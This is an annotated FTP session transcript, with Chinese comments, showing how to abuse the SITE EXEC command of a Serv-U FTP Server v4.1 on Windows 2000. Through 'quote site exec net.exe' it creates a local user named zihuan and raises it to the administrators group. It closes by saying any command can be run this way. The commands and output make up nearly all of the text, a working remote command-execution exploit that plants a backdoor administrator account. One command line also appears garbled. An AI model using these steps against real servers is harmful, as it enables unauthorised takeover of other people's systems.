ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id //輸入構造的使用者
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄,如果是winxp或者是windows server 2003就應該為windows目錄。
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user zihuan ziHUAN /add //利用系統的net.exe檔案加使用者。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators zihuan /add //提升為超級使用者
這樣就在本地系統上加了一個為zihuan密碼為:ziHUAN的超級使用者。也可以直接用quote site exec net.exe localhost administrators user /add命令把目前使用者提升到超級使用者組中去。當然也可以在系統上執行任何命令。